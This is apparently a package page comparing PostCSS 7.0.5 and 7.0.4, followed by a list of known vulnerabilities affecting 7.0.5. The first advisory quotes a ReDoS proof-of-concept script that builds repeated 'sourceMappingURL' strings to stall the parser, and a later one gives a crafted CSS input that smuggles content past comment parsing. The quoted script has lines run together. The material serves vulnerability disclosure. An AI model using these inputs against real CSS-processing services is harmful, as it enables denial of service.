PostCSS version 7.0.5 is a minor update to the popular JavaScript tool for transforming CSS with plugins, released on October 2, 2018, following version 7.0.4 which was released on September 27, 2018. Both versions share the same core dependencies: chalk for stylized console output, source-map for debugging, and supports-color for color support detection. They are licensed under MIT. Maintained by Andrey Sitnik.
While their functionalities remain largely consistent, there are subtle differences. Notably, version 7.0.5 includes only 35 files within its distribution package, occupies a slightly smaller unpacked size of 591,565 bytes, while version 7.0.4 contained 36 files and an unpacked size of 593,703 bytes. This reduction in files and size likely reflects minor optimisations, bug fixes, or the removal of redundant resources.
Developers migrating from 7.0.4 to 7.0.5 can expect a seamless transition since the core API and dependencies remain unchanged. Existing plugins and workflows should function without modification. The reduced package size of the newer version could lead to marginal improvements in installation time and disk space usage, offering a slight advantage for projects concerned with performance and efficiency. Reviewing the changelog for the specific details of the changes is always recommended to ensure full compatibility and understanding of the update.
All the vulnerabilities related to the version 7.0.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.